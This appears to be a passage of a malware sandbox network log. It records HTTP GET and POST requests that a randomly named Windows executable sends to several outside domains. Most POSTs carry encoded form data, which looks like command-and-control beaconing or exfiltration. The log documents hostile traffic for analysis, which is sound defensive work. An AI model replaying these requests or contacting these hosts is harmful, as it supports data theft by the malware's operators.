                                                                                        Data Ascii: XbDhGVR=ILUXf4KRS20ZBnhk83r9DYxxOkFcb2HMJuPG5aSApjfZKDn4WJkJVnjT6rOCTc1FAMPVPiawxGwrHtNstG/b0tVrn0tKEDYKQS+IIGMSBLuU1Gx5pp5zoti5FoB5J5vLTHMbOmSoL7MVJ2knSbtFfjAXKeksXW4WYqkF+Dz2rSlj2uha/5QNG6YvvslOm3fLw6wMYW13q2Ix/wrC1gVxhOXPS7DEy33Ru1Qp+Jn6BqJVbXAQ/CcDBWXKx9XHs6EwU+H+qctkI05vhXGWfEFfJjucnp6HEBjEb5DPqZQdU2AtL0ChINlfoohZGkohpxzQQLPXX65oXTxPepwSgKxRpNCX7XRlVWHdbC5m0D3XG5oHU+RIkYUr11F05NuViRrFgNmM0hyS+f7QGVD+2rNRYvbp3th/EZamwI307LEjbH6M0QGK/RkYw8t+VoR1xNjDKWk/AewqDEuwrKu4VmNSFgjfCaDqWd5rnoGfeAw78x78znzO+t77emxn2PBYrBYAPq9x365qIxsAe1t5gcZX/usYQny+2QJjmZATL97c0Xz5B4kEt6v2cHaTc65e1Bn5Pm5lPCrhfAANWjvsCY2dzXstrhbtOG3rbm4DB1KaIobrlPDnrPxJxf1IG9qrInbI9d9DG6jRyiF52yY28ZZseQamRPSwhbJvO55iuhVk0+tlApK2AqCVH/jF8D/akwsS7QdaC19qrBZRgudkc6dZMaO5tKSZlc7kQS1wGwOJ0Er6Sg8VZuOoGoKr1WYInMp2EMOrGiTgZQEHfVygHEIh+S3TrvamkLztsFOy60KxkQOUP6n2nUTAlZWlxMOr4gpAjQAIkzwpLlzds91UiXz1PNXEOzpPqrtojAOXs9SHgJq1emw3sIp83fIPE70Ivy6CencJmwrTbumkW3gUivNGC/z5hZs9/y+Xq4CbGjpeAoylK2SohtVA1cdxOobz/WaXsMhEkz2ouV8ARrSz5acuL7XO98F5zhwo4aAZPL2WRifr [TRUNCATED]


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.4499463.33.130.190804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:23.425488949 CET450OUTGET /3c6w/?XbDhGVR=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.trifecta.center
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Nov 1, 2024 19:44:24.051904917 CET403INHTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Fri, 01 Nov 2024 18:44:23 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 263
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 62 44 68 47 56 52 3d 46 4a 38 33 63 4f 76 46 57 45 63 63 49 42 38 59 36 53 43 73 42 71 4a 67 4d 6c 46 53 4a 55 58 49 43 76 2f 6e 73 4c 36 37 68 41 37 50 55 42 62 50 63 59 55 65 4f 67 72 64 79 61 71 6d 48 39 5a 31 41 2b 4c 56 4d 52 43 4d 7a 47 30 65 4a 74 46 68 78 6c 6a 33 35 76 35 55 6e 7a 64 56 63 52 49 38 45 54 47 63 49 33 6c 31 4e 34 75 33 34 6b 35 57 74 64 38 50 68 4e 73 3d 26 51 7a 3d 42 4a 76 70 30 42 64 68 78 58 69 54 43 54 47 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?XbDhGVR=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&Qz=BJvp0BdhxXiTCTGP"}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.449981154.23.184.95804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:29.501153946 CET698OUTPOST /rj0s/ HTTP/1.1
                                                                                        Host: www.wcp95.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wcp95.top
                                                                                        Referer: http://www.wcp95.top/rj0s/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 39 79 33 4c 71 66 6e 64 63 72 47 45 31 77 51 55 72 7a 45 44 70 64 49 32 4b 64 6d 57 4e 32 5a 73 36 72 63 37 30 43 56 2f 36 57 33 2f 51 68 45 52 5a 79 35 78 4b 38 4b 30 2f 50 63 51 31 79 4c 74 63 39 62 70 49 66 48 68 75 70 62 56 46 74 46 47 62 4f 6b 7a 31 64 65 7a 72 4b 75 43 48 4c 31 34 2f 4c 59 78 47 51 57 61 55 32 58 66 39 68 5a 49 53 37 43 67 61 48 6b 45 45 37 68 6b 38 65 4a 59 70 74 7a 7a 4a 6d 53 6a 4b 53 66 34 63 41 4d 69 4e 76 31 4e 4e 44 37 65 76 79 63 75 78 6a 79 41 69 51 72 63 55 47 4f 4e 6f 47 69 31 31 33 66 62 44 75 57 71 77 35 35 57 64 6c 76 76 46 4b 30 57 72 51 3d 3d
                                                                                        Data Ascii: XbDhGVR=9y3LqfndcrGE1wQUrzEDpdI2KdmWN2Zs6rc70CV/6W3/QhERZy5xK8K0/PcQ1yLtc9bpIfHhupbVFtFGbOkz1dezrKuCHL14/LYxGQWaU2Xf9hZIS7CgaHkEE7hk8eJYptzzJmSjKSf4cAMiNv1NND7evycuxjyAiQrcUGONoGi113fbDuWqw55WdlvvFK0WrQ==
                                                                                        Nov 1, 2024 19:44:30.496536016 CET312INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:44:30 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 148
                                                                                        Connection: close
                                                                                        ETag: "66a747c1-94"
                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.449996154.23.184.95804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:32.050538063 CET718OUTPOST /rj0s/ HTTP/1.1
                                                                                        Host: www.wcp95.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wcp95.top
                                                                                        Referer: http://www.wcp95.top/rj0s/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 39 79 33 4c 71 66 6e 64 63 72 47 45 31 54 49 55 70 55 77 44 68 64 49 78 47 39 6d 57 45 57 5a 6f 36 72 51 37 30 41 34 36 37 6a 6e 2f 51 41 30 52 61 77 64 78 4c 38 4b 30 77 76 64 59 34 53 4c 69 63 39 48 62 49 65 37 68 75 70 66 56 46 70 42 47 62 35 49 79 31 4e 65 31 79 61 75 41 4b 72 31 34 2f 4c 59 78 47 51 53 6b 55 33 2f 66 36 53 52 49 54 66 32 68 5a 48 6c 32 55 72 68 6b 75 75 49 54 70 74 7a 64 4a 6a 36 61 4b 51 33 34 63 41 38 69 44 65 31 4b 48 44 37 59 79 69 64 61 33 44 79 4a 6d 44 61 6f 62 31 4f 53 6e 6d 53 5a 77 78 53 42 53 66 33 39 69 35 64 6c 41 69 6d 62 49 4a 4a 66 77 51 34 76 64 6d 4d 71 2f 30 4e 69 57 56 54 71 33 57 5a 61 6f 6d 45 3d
                                                                                        Data Ascii: XbDhGVR=9y3LqfndcrGE1TIUpUwDhdIxG9mWEWZo6rQ70A467jn/QA0RawdxL8K0wvdY4SLic9HbIe7hupfVFpBGb5Iy1Ne1yauAKr14/LYxGQSkU3/f6SRITf2hZHl2UrhkuuITptzdJj6aKQ34cA8iDe1KHD7Yyida3DyJmDaob1OSnmSZwxSBSf39i5dlAimbIJJfwQ4vdmMq/0NiWVTq3WZaomE=
                                                                                        Nov 1, 2024 19:44:33.057655096 CET312INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:44:32 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 148
                                                                                        Connection: close
                                                                                        ETag: "66a747c1-94"
                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.450011154.23.184.95804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:34.597165108 CET10800OUTPOST /rj0s/ HTTP/1.1
                                                                                        Host: www.wcp95.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wcp95.top
                                                                                        Referer: http://www.wcp95.top/rj0s/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 39 79 33 4c 71 66 6e 64 63 72 47 45 31 54 49 55 70 55 77 44 68 64 49 78 47 39 6d 57 45 57 5a 6f 36 72 51 37 30 41 34 36 37 6a 76 2f 51 79 4d 52 41 52 64 78 49 38 4b 30 35 50 64 62 34 53 4c 46 63 39 50 66 49 65 32 61 75 72 58 56 46 4b 5a 47 4b 62 77 79 2b 4e 65 31 36 36 75 4e 48 4c 31 74 2f 4c 49 39 47 51 43 6b 55 33 2f 66 36 55 31 49 61 72 43 68 56 6e 6b 45 45 37 68 42 38 65 49 37 70 75 44 72 4a 6a 2b 56 4a 68 58 34 63 67 73 69 4f 4d 64 4b 46 6a 37 61 78 69 64 43 33 44 2f 52 6d 44 57 53 62 32 53 30 6e 6c 4f 5a 79 45 37 65 47 4f 66 45 77 6f 46 4a 5a 43 43 73 4d 62 35 4a 30 77 34 53 55 56 55 33 6b 77 52 62 62 46 71 67 6a 32 78 68 35 79 74 44 66 62 4a 6c 2f 71 38 6a 47 73 43 6e 6d 6d 42 41 79 61 4c 67 39 41 2b 75 6d 34 74 50 63 67 39 64 51 77 38 4f 67 4e 50 55 38 75 38 6f 71 4b 6a 66 38 62 54 65 7a 53 78 58 72 51 32 34 62 7a 77 6c 74 35 6f 52 46 30 62 74 4f 45 44 5a 4e 51 61 2f 2b 79 4e 33 6f 65 36 5a 34 73 79 37 70 4f 5a 47 62 4f 70 45 6e 59 4f 4a 46 59 6c 47 58 45 59 70 6c 53 [TRUNCATED]
                                                                                        Data Ascii: XbDhGVR=9y3LqfndcrGE1TIUpUwDhdIxG9mWEWZo6rQ70A467jv/QyMRARdxI8K05Pdb4SLFc9PfIe2aurXVFKZGKbwy+Ne166uNHL1t/LI9GQCkU3/f6U1IarChVnkEE7hB8eI7puDrJj+VJhX4cgsiOMdKFj7axidC3D/RmDWSb2S0nlOZyE7eGOfEwoFJZCCsMb5J0w4SUVU3kwRbbFqgj2xh5ytDfbJl/q8jGsCnmmBAyaLg9A+um4tPcg9dQw8OgNPU8u8oqKjf8bTezSxXrQ24bzwlt5oRF0btOEDZNQa/+yN3oe6Z4sy7pOZGbOpEnYOJFYlGXEYplSu2CeoxhsibeYFsy0LvRSGqfVHQwEwxmfjWId+pNos/ILu42Ib1jYWFGLtIJLeLi3gQSbg+db+xbZgRdD5/7JjdSES2HtsTuQAWEq8oQJzebxhK+yJnLTg9KObwi96toXEElVhKCcBkInMOKOdg421rDaxDG80HhXjNF5VwP9kunpxotaHeYZ+2bhdILhp1eKD3EDK1/K6QCTxVv4EHicWs9GJAuf6bvXjkS163RIAKwnk3IO2aLxLOPHxL4bNzWIvnOR9jwztPO7zYfe9RPNG6qsh5g3+5GhGUXHznzVnMURyJduuoOlGaxRPEqgpB62vB/EDt80YTvwnS6MvJ/3OKrNu/I2hjd8U3DFgsnxyd+KVF9V+4EK4sqxWeUU0kX9OQY0wpb9eufuPYmCOup2fySy4oGJz8EZv8kibCwHQfwaHNtB38LIvh4hULGlU1ODXwODJ+jAeMp9ngPpHlTHLNaAD5vcZspcUNavzPGL07+cSKKN2oFXL3VaLNzQKa5VFmVhiXMIxmn3H/60F5E/3trKYa7+LpFsBSC1HKKl5ZuCbmHCU61llH7Tqs8/TQc7wzNtE9v/+dA0OtJckZr16uJUIgUjI4VeqMcqXtE28LLeoD+uv6k1pbfU/cWhj18A9voXLeYAaM9QnsNCLtWJE8+WFqpseAI8W0 [TRUNCATED]
                                                                                        Nov 1, 2024 19:44:35.562186003 CET312INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:44:35 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 148
                                                                                        Connection: close
                                                                                        ETag: "66a747c1-94"
                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.450015154.23.184.95804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:37.140327930 CET444OUTGET /rj0s/?XbDhGVR=wwfrpq2GStq8yXhruzchqPI2DPKMclx/34kF3CMx+1v+TSw3PCRza/Sx++Q9wxTideP8HMqKtaf0MdZtX7Zp7/WG/Y2BEJVTn7MuHEHfS2P/6TB7VaKsbng=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.wcp95.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Nov 1, 2024 19:44:38.138628006 CET312INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:44:37 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 148
                                                                                        Connection: close
                                                                                        ETag: "66a747c1-94"
                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.450016172.67.185.22804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:43.383128881 CET722OUTPOST /xh7d/ HTTP/1.1
                                                                                        Host: www.gokulmohan.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.gokulmohan.online
                                                                                        Referer: http://www.gokulmohan.online/xh7d/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 6f 5a 4c 58 32 59 51 76 4a 2f 68 50 62 72 74 63 6e 6a 71 43 2b 61 63 57 2f 45 77 70 58 68 55 37 36 57 46 6d 38 56 64 38 37 4c 6f 32 49 49 79 50 2f 36 53 6d 6b 77 6a 41 47 61 66 2b 4d 64 36 57 4e 2f 57 42 56 38 44 4f 52 72 4b 71 58 4a 66 41 54 63 58 51 72 6c 2b 36 6d 39 77 47 62 4f 46 6a 64 6b 50 42 48 6e 2b 74 6e 62 2f 4b 49 35 48 4a 67 68 49 59 38 6f 66 58 73 58 56 6b 35 53 34 44 68 5a 46 6b 35 46 54 58 35 6c 66 4d 6a 31 6c 64 56 6d 62 77 49 75 41 46 6f 79 72 58 2b 56 34 53 79 66 79 62 2b 52 6c 53 34 65 6a 37 6f 5a 4e 43 45 69 42 4b 71 74 78 66 67 4e 73 66 72 78 6f 50 62 51 3d 3d
                                                                                        Data Ascii: XbDhGVR=oZLX2YQvJ/hPbrtcnjqC+acW/EwpXhU76WFm8Vd87Lo2IIyP/6SmkwjAGaf+Md6WN/WBV8DORrKqXJfATcXQrl+6m9wGbOFjdkPBHn+tnb/KI5HJghIY8ofXsXVk5S4DhZFk5FTX5lfMj1ldVmbwIuAFoyrX+V4Syfyb+RlS4ej7oZNCEiBKqtxfgNsfrxoPbQ==
                                                                                        Nov 1, 2024 19:44:44.513079882 CET1236INHTTP/1.1 403 Forbidden
                                                                                        Date: Fri, 01 Nov 2024 18:44:44 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: same-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMc4kej3xsHWVHVyRtzgDEwL97kfIAilrzvQYdNJDZZESasPzZugSaO%2FW1kreJw82UqtBttv0aMYyYbyaw5kgP5nHL%2BT0sNXT7f53e%2FybG1c79frq5SR%2FLc0lR80DBlwlzmSyRsTPBQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbe09ae7a984796-DFW
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1243&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c
                                                                                        Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,
                                                                                        Nov 1, 2024 19:44:44.513092995 CET1138INData Raw: a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11 ff ed 5b 74
                                                                                        Data Ascii: Z-Itf~ZI8RatinkV/8?=9:::a~LiN.[tn,y6|4m^)6}k=eYlMR<@*_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#*SC!Bt


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.450017172.67.185.22804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:45.926578999 CET742OUTPOST /xh7d/ HTTP/1.1
                                                                                        Host: www.gokulmohan.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.gokulmohan.online
                                                                                        Referer: http://www.gokulmohan.online/xh7d/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 6f 5a 4c 58 32 59 51 76 4a 2f 68 50 62 4c 39 63 6c 45 65 43 34 36 63 56 7a 6b 77 70 65 42 55 2f 36 57 4a 6d 38 51 74 73 34 2b 34 32 49 74 32 50 6c 37 53 6d 30 67 6a 41 4d 36 66 78 42 39 36 72 4e 2f 61 4a 56 34 44 4f 52 6f 32 71 58 4e 50 41 54 72 72 52 72 31 2b 38 72 64 77 41 66 4f 46 6a 64 6b 50 42 48 6e 71 58 6e 66 54 4b 4a 4c 54 4a 69 44 73 66 6a 59 66 57 70 58 56 6b 7a 79 34 48 68 5a 46 43 35 45 50 35 35 6e 6e 4d 6a 78 68 64 55 33 62 78 42 75 41 44 6d 53 71 45 32 32 46 59 37 2b 50 39 32 33 35 48 2b 64 6e 63 67 2f 41 59 56 54 67 64 34 74 56 73 39 4b 6c 72 6d 79 56 47 41 51 54 43 4e 41 68 34 6b 59 4a 52 63 79 6d 63 4b 4d 68 6a 54 5a 41 3d
                                                                                        Data Ascii: XbDhGVR=oZLX2YQvJ/hPbL9clEeC46cVzkwpeBU/6WJm8Qts4+42It2Pl7Sm0gjAM6fxB96rN/aJV4DORo2qXNPATrrRr1+8rdwAfOFjdkPBHnqXnfTKJLTJiDsfjYfWpXVkzy4HhZFC5EP55nnMjxhdU3bxBuADmSqE22FY7+P9235H+dncg/AYVTgd4tVs9KlrmyVGAQTCNAh4kYJRcymcKMhjTZA=
                                                                                        Nov 1, 2024 19:44:47.090326071 CET1236INHTTP/1.1 403 Forbidden
                                                                                        Date: Fri, 01 Nov 2024 18:44:47 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: same-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
